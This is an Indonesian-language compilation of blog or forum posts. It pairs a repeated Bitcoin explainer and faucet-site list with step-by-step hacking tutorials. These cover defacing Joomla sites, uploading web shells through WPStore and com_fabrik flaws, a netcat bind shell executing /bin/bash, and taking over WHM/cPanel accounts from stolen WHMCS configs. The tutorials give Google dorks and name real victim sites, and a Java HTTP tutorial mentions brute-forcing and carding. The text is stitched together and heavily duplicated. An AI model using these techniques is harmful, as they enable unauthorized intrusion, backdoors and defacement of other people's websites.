Bahkan Bitcoin sendiri pernah dikabarkan menjadi saingan utama industri perbankan. Macleans menuturkan bahwa Bitcoin berbeda dengan mata uang online yang pernah ada di internet. Sistem yang terdesentralisasi berarti peredaran uang tidak bisa diatur oleh siapapun. Dan layaknya uang kas, transaksi bitcoin terjadi langsung dari orang ke orang tanpa perantara sehingga biaya pengiriman sangatlah minim dan transaksi ini terjadi tanpa ada batasan apapun. Sistem yang terdesentralisasi juga menjaga keamanan privasi pemilik bitcoin dan memastikan bahwa uang bitcoin mereka tidak bisa dibekukan oleh siapapun. Penggunaan bitcoin sendiri juga terus meningkat. Mt.Gox, exchanger bitcoin terbesar menunjukkan bahwa mereka telah melakukan penukaran bitcoin dengan dollar hingga mencapai titik fantastis sebesar $3 juta dollar dengan nilai tukar 1 bitcoin untuk 13 dollar. Kedepannya bitcoin diramalkan akan terus meningkat dan pengguna bitcoin akan terus bertambah.
Seperti layaknya mata uang lainnya Bitcoin telah digunakan di banyak tempat seperti :
Perdagangan barang umumnya seperti di Forum Jual Beli : Bitmit, BitcoinMarketPlace.
Penukar Bitcoin dengan mata uang lain seperti USD, Yen, Euro, dll : mtgox, bitcoincharts.
Forex menggunakan bitcoin : Bit4X, FirstNationaLib.
Penyedia jasa penyimpanan wallet bitcoin. Berfungsi layaknya account Paypal, LR dll : BlockChain, CoinBase, WalletBit.
Untuk mengetahui tentang bitcoin lebih lanjut anda dapat melihat di weusecoins.com atau bitcoin.org.
harga 1 BTC setara $1016, sungguh besar bukan.
Sekarang saya akan membagikan cara mendapatkan bitcoin secara GRATIS, tetapi sebelum mendapatkan Bitcoin, anda harus memiliki wallet tempat menyimpan Bitcoin yang anda dapatkan. Untuk membuat wallet bitcoin, silahkan ikuti petunjuk dibawai ini :
-Buka situs Blockchain(bisa dicari di google)
-klik wallet
-Setelah mengikuti langkah pada Poin 2 anda akan dibawa pada halaman berikut :
-Klik Start A New Wallet dan anda akan masuk pada halaman form pendaftaran.
-Setelah anda login ke wallet yang telah dibuat tadi, anda akan diberikan alamat wallet yang menjadi sarana untuk menerima dan mengirim bitcoin. Alamat wallet anda berupa gabungan angka dan hutuf contohnya : 19ZZ8DZsb5qhtchuKPZWET7Uj8rDoj4KgmB.
Jika anda sudah memiliki wallet bitcoin, sekarang saatnya saya akan membagikan dimana anda bisa mendapatkan bitcoin secara gratis.
Tempat berburu Bitcoin gratis :
NameDescriptionLink
Bitcoins4meDapatkan Bitcoins gratis setiap 1 jamVisit
BitcoinerDapatkan bitcoin gratis dalam jumlah acak setiap 24 jamVisit
BitvisitorDapatkan bicoins gratis dengan melihat iklanVisit
Bitcoin4youDapatkan hingga 0,42 mBTC setiap 24 jamVisit
Earn free bitcoinsDapatkan hingga 24 uBTC per hariVisit
NetlookupDapatkan Bitcoins gratis setiap 24 jamVisit
CointicketDapatkan Bitcoins gratis setiap 24 jamVisit
BitcointreeDapatkan Bitcoins gratis setiap 24 jamVisit
CoinvisitorDapatkan bicoins gratis dengan melihat iklanVisit
Bitcoin AddictDapatkan 0,00006 BTC, dan kesempatan untuk menang jackpot 0,01 BTCVisit
Bunny RunDapatkan Bitcoins gratis setiap 24 jam dengan bermain mini gameVisit
ElbitcoingratisDapatkan Bitcoins gratis setiap 1 jamVisit
Coinad Register dan dapatkan Bitcoins gratis dengan melihat iklanVisit
CointubeMasukkan address bitcoin anda, solve captcha, dan klik video untuk ditontonVisit
Free BTCRegister terlebih dahulu, setelah itu anda bisa mendapatkan bitcoin dari menonton video dan mengetik captchaVisit
Btc4youDapatkan Bitcoins gratis setiap 30 menitVisit
GreencoinsDapatkan Bitcoins gratis setiap 30 menitVisit
NioctibDapatkan Bitcoins gratis setiap 30 menitVisit
The Free BitcoinsDapatkan Bitcoins gratis setiap 30 menitVisit
Virtual FaucetDapatkan Bitcoins gratis setiap 30 menitVisit
SrbitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Raw BitcoinsDapatkan Bitcoins gratis setiap 30 menitVisit
CanhasbitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Freebtc4allDapatkan Bitcoins gratis setiap 30 menitVisit
BTC MineDapatkan Bitcoins gratis setiap 30 menitVisit
The BitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Faucet BTCDapatkan Bitcoins gratis setiap 10 menitVisit
Bitcoin ForestDapatkan Bitcoins gratis setiap 1 jamVisit
Honey BitcoinDapatkan bicoins gratis dengan melihat iklanVisit
Free CoinsDapatkan Bitcoins gratis setiap 24 jamVisit
BTC FlowDapatkan Bitcoins gratis setiap 24 jamVisit
CaptchaCoinKetik captcha untuk mendapatkan bitcoin gratis tanpa ada batasan waktuVisit
Land Of Bitcoin Register dahulu kemudian login untuk memulai menambang bitcoin tanpa bantuan software apapun (bitcoin anda akan bertambah sendiri setiap 30 detik)Visit
Free Bitcoin Register dahulu kemudian login dan dapatkan bitcoin gratis setiap 1 jamVisit
Daily free bitcoin Dapatkan bitcoin gratis setiap 1 jamVisit
Mmoclub Dapatkan bitcoin gratis setiap 1 jamVisit
Btcclicks Register dahulu dan lihat iklan untuk mendapatkan bitcoin gratisVisit
Redcoins Dapatkan bitcoin gratis setiap 1 jamVisit
Coinreaper Kumpulan beberapa faucet bitcoinVisit
Klik link dari tabel diatas untuk mendapatkan bitcoin gratis setiap hari. Tabel diatas akan saya update jika ada web lain yang membagikan bitcoin secara gratis.
Selamat berburu bitcoin.
Desain dari Bitcoin memperbolehkan untuk kepemilikan tanpa identitas (anonymous) dan pemindahan kekayaan. Bitcoin - bitcoin dapat di simpan di komputer pribadi dalam sebuah format file wallet atau di simpan oleh sebuah servis wallet pihak ketiga, dan terlepas dari semua itu Bitcoin - bitcoin dapat di kirim lewat internet kepada siapapun yang mempunyai sebuah alamat Bitcoin. Topologi peer-to-peer bitcoin dan kurangnya administrasi tunggal membuatnya tidak mungkin untuk otoritas, pemerintahan apapun, untuk memanipulasi nilai dari bitcoin - bitcoin atau menyebabkan inflasi dengan memproduksi lebih banyak bitcoin.
Singkatnya bitcoin adalah mata uang elektronik yang didasari oleh teknologi yang paling baru dan mulai menjadi pilihan sebagai pengganti emas. Bitcoin sendiri dibuat dari gabungan berbagai teknologi dari cryptografi, ekonomi dan network membentuk sebuah program yang terdiri dari network peer-to-peer yang kokoh dan hampir mustahil untuk diserang, teknologi atau lebih tepatnya mata uang baru ini disebut cryptocurrency. Bitcoin ini pada akhirnya berfungsi sebagai mata uang.
Berdasarkan DailyDotCom penggunaan Bitcoin atau mata uang cryptografi ini terus meningkat drastis. Tahun 2012 lalu titik transaksi tertinggi berhasil diraih dengan transaksi mencapai 58.000 per hari. Sekarang setelah tahun baru transaksi Bitcoin terus stabil pada titik 50.000 transaksi per harinya. Pengguna internet terus antusias menggunakan bitcoin sebagai mata uang internet yang sepenuhnya bersifat digital. Bahkan perusahaan raksasa seperti Wordpress sekarang menerima mata uang bitcoin dalam penyediaan jasanya. Berdasarkan Forbes bitcoin menjadi alternatif mata uang yang populer karena kemudahannya dalam penggunaannya, sistem yang terdesentralisasi dan akses yang tersedia untuk semua orang menjadi daya tarik utama dalam mata uang ini.
Bahkan Bitcoin sendiri pernah dikabarkan menjadi saingan utama industri perbankan. Macleans menuturkan bahwa Bitcoin berbeda dengan mata uang online yang pernah ada di internet. Sistem yang terdesentralisasi berarti peredaran uang tidak bisa diatur oleh siapapun. Dan layaknya uang kas, transaksi bitcoin terjadi langsung dari orang ke orang tanpa perantara sehingga biaya pengiriman sangatlah minim dan transaksi ini terjadi tanpa ada batasan apapun. Sistem yang terdesentralisasi juga menjaga keamanan privasi pemilik bitcoin dan memastikan bahwa uang bitcoin mereka tidak bisa dibekukan oleh siapapun. Penggunaan bitcoin sendiri juga terus meningkat. Mt.Gox, exchanger bitcoin terbesar menunjukkan bahwa mereka telah melakukan penukaran bitcoin dengan dollar hingga mencapai titik fantastis sebesar $3 juta dollar dengan nilai tukar 1 bitcoin untuk 13 dollar. Kedepannya bitcoin diramalkan akan terus meningkat dan pengguna bitcoin akan terus bertambah.
Seperti layaknya mata uang lainnya Bitcoin telah digunakan di banyak tempat seperti :
Perdagangan barang umumnya seperti di Forum Jual Beli : Bitmit, BitcoinMarketPlace.
Penukar Bitcoin dengan mata uang lain seperti USD, Yen, Euro, dll : mtgox, bitcoincharts.
Forex menggunakan bitcoin : Bit4X, FirstNationaLib.
Penyedia jasa penyimpanan wallet bitcoin. Berfungsi layaknya account Paypal, LR dll : BlockChain, CoinBase, WalletBit.
Untuk mengetahui tentang bitcoin lebih lanjut anda dapat melihat di weusecoins.com atau bitcoin.org.
harga 1 BTC setara $1016, sungguh besar bukan.
Sekarang saya akan membagikan cara mendapatkan bitcoin secara GRATIS, tetapi sebelum mendapatkan Bitcoin, anda harus memiliki wallet tempat menyimpan Bitcoin yang anda dapatkan. Untuk membuat wallet bitcoin, silahkan ikuti petunjuk dibawai ini :
-Buka situs Blockchain(bisa dicari di google)
-klik wallet
-Setelah mengikuti langkah pada Poin 2 anda akan dibawa pada halaman berikut :
-Klik Start A New Wallet dan anda akan masuk pada halaman form pendaftaran.
-Setelah anda login ke wallet yang telah dibuat tadi, anda akan diberikan alamat wallet yang menjadi sarana untuk menerima dan mengirim bitcoin. Alamat wallet anda berupa gabungan angka dan hutuf contohnya : 19ZZ8DZsb5qhtchuKPZWET7Uj8rDoj4KgmB.
Jika anda sudah memiliki wallet bitcoin, sekarang saatnya saya akan membagikan dimana anda bisa mendapatkan bitcoin secara gratis.
Tempat berburu Bitcoin gratis :
NameDescriptionLink
Bitcoins4meDapatkan Bitcoins gratis setiap 1 jamVisit
BitcoinerDapatkan bitcoin gratis dalam jumlah acak setiap 24 jamVisit
BitvisitorDapatkan bicoins gratis dengan melihat iklanVisit
Bitcoin4youDapatkan hingga 0,42 mBTC setiap 24 jamVisit
Earn free bitcoinsDapatkan hingga 24 uBTC per hariVisit
NetlookupDapatkan Bitcoins gratis setiap 24 jamVisit
CointicketDapatkan Bitcoins gratis setiap 24 jamVisit
BitcointreeDapatkan Bitcoins gratis setiap 24 jamVisit
CoinvisitorDapatkan bicoins gratis dengan melihat iklanVisit
Bitcoin AddictDapatkan 0,00006 BTC, dan kesempatan untuk menang jackpot 0,01 BTCVisit
Bunny RunDapatkan Bitcoins gratis setiap 24 jam dengan bermain mini gameVisit
ElbitcoingratisDapatkan Bitcoins gratis setiap 1 jamVisit
Coinad Register dan dapatkan Bitcoins gratis dengan melihat iklanVisit
CointubeMasukkan address bitcoin anda, solve captcha, dan klik video untuk ditontonVisit
Free BTCRegister terlebih dahulu, setelah itu anda bisa mendapatkan bitcoin dari menonton video dan mengetik captchaVisit
Btc4youDapatkan Bitcoins gratis setiap 30 menitVisit
GreencoinsDapatkan Bitcoins gratis setiap 30 menitVisit
NioctibDapatkan Bitcoins gratis setiap 30 menitVisit
The Free BitcoinsDapatkan Bitcoins gratis setiap 30 menitVisit
Virtual FaucetDapatkan Bitcoins gratis setiap 30 menitVisit
SrbitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Raw BitcoinsDapatkan Bitcoins gratis setiap 30 menitVisit
CanhasbitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Freebtc4allDapatkan Bitcoins gratis setiap 30 menitVisit
BTC MineDapatkan Bitcoins gratis setiap 30 menitVisit
The BitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Faucet BTCDapatkan Bitcoins gratis setiap 10 menitVisit
Bitcoin ForestDapatkan Bitcoins gratis setiap 1 jamVisit
Honey BitcoinDapatkan bicoins gratis dengan melihat iklanVisit
Free CoinsDapatkan Bitcoins gratis setiap 24 jamVisit
BTC FlowDapatkan Bitcoins gratis setiap 24 jamVisit
CaptchaCoinKetik captcha untuk mendapatkan bitcoin gratis tanpa ada batasan waktuVisit
Land Of Bitcoin Register dahulu kemudian login untuk memulai menambang bitcoin tanpa bantuan software apapun (bitcoin anda akan bertambah sendiri setiap 30 detik)Visit
Free Bitcoin Register dahulu kemudian login dan dapatkan bitcoin gratis setiap 1 jamVisit
Daily free bitcoin Dapatkan bitcoin gratis setiap 1 jamVisit
Mmoclub Dapatkan bitcoin gratis setiap 1 jamVisit
Btcclicks Register dahulu dan lihat iklan untuk mendapatkan bitcoin gratisVisit
Redcoins Dapatkan bitcoin gratis setiap 1 jamVisit
Coinreaper Kumpulan beberapa faucet bitcoinVisit
Klik link dari tabel diatas untuk mendapatkan bitcoin gratis setiap hari. Tabel diatas akan saya update jika ada web lain yang membagikan bitcoin secara gratis.
Selamat berburu bitcoin.
Cara Deface Dengan Teknik Exploit Joomla = Com_User
Assalamualaikum....
pasti pada ga sabar kan udah nunggu dari kemaren ? wkwkwk langsung dah kita ke KTP :P
oke Download dlu html nya :
Download
Langkah
1. Cari web target di Google dengan memasukkan Dork berikut .
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
#Dork Bisa di kembangin sendiri :P
2. lalu pilih target sobat , kalo sudah dapat web targetnya langsung tmbhkan target sobat dengan /administrator/
Perhatikan tulisan Joomla!® is free software released under the GNU General Public License
Dengan kotak tidak jauh .
contoh : http://www.eco-ramonage.com/administrator/index.php
.lalu masukan exploit berikut.
index.php?option=com_users&view=registration
ane ambil contoh disni :
http://www.eco-ramonage.com
3. kemudian ane ganti menjadi :
http://www.eco-ramonage.com/index.php?op...gistration
4. lalu Ctrl + u , trus cari hidden dan register dengan ctrl f ( hidden ) dan ( register )
5.jalankan file html yang tadi di download … ( password sengaja saya tidak samakan) jangan dirubah passwordnya ..
klik register
6. nntinya akan masuk di web asli.. disini masukan pass yang sama , email bleh di rubah .. klik register .
jika muncul pesan seperti ini
Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you get the email before you can login.
7. Cek email .. trus klik kanan ( open link in new tab )
jika sudah ????? masuk k bagian administrator tadi
http://www.site.com/administrator
8.login pake user pass yang tadi di daftar.
trus cara upload backdoor
. klik template manager
. Klik templates
. Klu udah di dalam templates Baru klik atomic…
. Klik edit main page templates
. Copy paste backdoor punya sobat ke dalam sini baru klik save
9. jika ada tulisan File successfully saved berarti jadi !!!
untuk masuk k backdoor ..
http://www.site.com/templates/atomic/index.php
klik public html , baru upload script deface ..
DONE !!!! web berhasil di hack =))
Nb :Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba! :P:P:P
pasti pada ga sabar kan udah nunggu dari kemaren ? wkwkwk langsung dah kita ke KTP :P
oke Download dlu html nya :
Download
Langkah
1. Cari web target di Google dengan memasukkan Dork berikut .
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
#Dork Bisa di kembangin sendiri :P
2. lalu pilih target sobat , kalo sudah dapat web targetnya langsung tmbhkan target sobat dengan /administrator/
Perhatikan tulisan Joomla!® is free software released under the GNU General Public License
Dengan kotak tidak jauh .
contoh : http://www.eco-ramonage.com/administrator/index.php
.lalu masukan exploit berikut.
index.php?option=com_users&view=registration
ane ambil contoh disni :
http://www.eco-ramonage.com
3. kemudian ane ganti menjadi :
http://www.eco-ramonage.com/index.php?op...gistration
4. lalu Ctrl + u , trus cari hidden dan register dengan ctrl f ( hidden ) dan ( register )
5.jalankan file html yang tadi di download … ( password sengaja saya tidak samakan) jangan dirubah passwordnya ..
klik register
6. nntinya akan masuk di web asli.. disini masukan pass yang sama , email bleh di rubah .. klik register .
jika muncul pesan seperti ini
Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you get the email before you can login.
7. Cek email .. trus klik kanan ( open link in new tab )
jika sudah ????? masuk k bagian administrator tadi
http://www.site.com/administrator
8.login pake user pass yang tadi di daftar.
trus cara upload backdoor
. klik template manager
. Klik templates
. Klu udah di dalam templates Baru klik atomic…
. Klik edit main page templates
. Copy paste backdoor punya sobat ke dalam sini baru klik save
9. jika ada tulisan File successfully saved berarti jadi !!!
untuk masuk k backdoor ..
http://www.site.com/templates/atomic/index.php
klik public html , baru upload script deface ..
DONE !!!! web berhasil di hack =))
Nb :Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba! :P:P:P
Hack Web With WPStore
Hack Web With WPStore
oke ane newbie mau share tutor cupu
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
example :
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
Quote:/wp-content/themes/framework/upload
example :
Quote:http://yourweddingdress.co.za/wp-content...rk/upload/
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
Quote:username : root
password : toor
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
Quote:/wp-content/uploads/products_img/[nama shell anda].php
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
deface dengan com_fabrik .
Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Membuat Backdor di linux
1) siapkan 2 buah laptop sebagai percobaannya
2)Pada kedua komputer tersebut lakukan instalasi paket netcat
Code:
apt-get install netcat
3) Pada komputer target (server) buat backdoor dengan netcat
Code:
nc –l –p 5050 –e /bin/bash
catatan :-l : listen, siap menerima koneksi-p : pada port berapa koneksi diterima-e : jalankan perintah terminal yaitu /bin/bashSetelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam keadaan terbuka di sisi server.
Code:
# nmap localhost
4)Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat account pada komputer server
Code:
# nc 192.168.50.10 5050debianGUI:~# nc 10.252.42.132 5050adduser datahack => buat user datahack disisi serverAdding user `datahack' ...Adding new group `datahack' (1002) ...Adding new user `datahack' (1002) with group `datahack' ...Creating home directory `/home/datahack' ...Copying files from `/etc/skel' ...datahack => buat password : datahackdatahack => retype passwordChanging the user information for datahackEnter the new value, or press ENTER for the defaultFull Name []:Room Number []:Work Phone []:Home Phone []:Other []:yIs the information correct? [Y/n] y^C
5) Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi server, sehingga anda sudah berhasil masuk ke sisi server.
Code:
# telnet 192.168.50.10
Hack Web Host Manager (WHM)
Assalammualaikum…
Hallo
sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo
hacking2an.. hehehe :D oke sekarang saya mo bahas mengenai cara Hack Web Host Manager
(WHM) :p
Apa
itu Web Host Manager (WHM) ? >>>> Google aja yah :p
Sebelum
itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol
:D Nah,
Kalo hack WHM, disini kita butuh Config WHMCSnya :3 ga
semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa
juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri
yah :p utk config killernya bisa
gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita
sebelumnya Cara mencari config dalam website
Perhatian!
Tutorial ini dibuat sebagai pengetahuan
dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini
seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak
bertanggung jawab! Use at your own risk!
Pesan Onix AQua:
Gunakan ilmu dengan sebaik2nya,
karena 1 kebaikan yg kalian buat, maka 1000 kebaikan yang akan kalian
dapatkan. dan juga sebaliknya, jika 1 keburukan yang kalian lakukan,
maka 1000 keburukan akan selalu kalian dapatkan selama hidup!
Berikut
bahan2 yg sobat butuhkan:
- Web Shelled
- Whmcs killer
- Config whmcs
Disini saya udah nemu config WHMnya :
isi dalamnya seperti :
Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!
Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p
Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account
Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087
cth: 176.32.342.223:2086
udah pada bisa kan? kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:
Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini
kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.
Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!
kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:
Header Name : Authorization
Header Value : WHM username:AccessHash
Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start
Setelah itu tinggal sobat buka WHMnya.. IP:Port
Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah, maaf kalo masih semerawut :D
CREDIT : ONYQ AQUA
JAVA HOW TO SEND HTTP POST/GET REQUEST
Halo,lama ga temu ama akuh
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST
biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what
i mean ]
semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.
aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi
"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"
kita bikin di localhost dengan nama test.php
oke udah jelaskan,berarti link itu mengambil variable nama,berarti kita mengirim variable nama menggunakan java
pastikan library HttpClient di project java kamu.
ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)
nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST
biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what
i mean ]
semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.
aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi
"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"
kita bikin di localhost dengan nama test.php
PHP Code:
<?php
$nama = $_POST['nama']; // mengambil variable nama yang di kirim melalui http postif ($nama =="")
{
echo "Hallo " .$nama;
}
else
{
echo "client tidak mengirim variable nama";
}?>
pastikan library HttpClient di project java kamu.
ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
Code:
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package hn_httprequest;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.Consts;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
/**
*
* @author xb
*/
public class Main {
/**
* @param args the command line arguments
*/
public static void main(String[] args) {
try {
//ini alamat host/file yang kita minta/buka
String link = "http://localhost/test.php";
//deklarasikan http clientnya
DefaultHttpClient httpclient = new DefaultHttpClient();
//deklarasikan http responsennya
HttpResponse response;
//deklarasikan http postnya,ini untuk handle pengiriman requestnya
HttpPost httpost = new HttpPost(link);
//bikin array untuk tempat pengisian data yang mau di kirim
List<NameValuePair> data_post = new ArrayList<NameValuePair>();
//lalu masukan value post yang mau di kirim,pada kalo ini kita masukin variable nama dengan value dika_xb
data_post.add(new BasicNameValuePair("nama", "DIKA_XB"));
//masukan array yang berisi data yang mau di kirim ke httpost
httpost.setEntity(new UrlEncodedFormEntity(data_post, Consts.UTF_8));
//kirimkan data,lalu ambil respon dari server dengan httpresponse
response = httpclient.execute(httpost);
//ini deklarasi untuk mendapatin elemen elemen data yang udah kita ambil di httpresponse
HttpEntity entity = response.getEntity();
//oke kita coba untuk menampilkan respon server/halamannya
StringBuilder sb = new StringBuilder();
BufferedReader rd = new BufferedReader(new InputStreamReader(response.getEntity().getContent()));
int linex;
while ((linex = rd.read()) != -1) {
sb.append((char) linex);
}
//kita tampilkan status respon server,apakah dia 404 atau yg lain
System.out.println("respon : " + response.getStatusLine());
//kita tampilkan html responsenya
System.out.println(sb.toString());
} catch (Exception e) {
System.out.println("error " + e);
}
}
}
result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)
nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
4 trik Cara Upload Shell di Joomla
kali ini ane mo share bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. (ato mungkin repost)
kali aja ada yg belom tau, kaya newbie seperti ane.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload , lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
Klik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
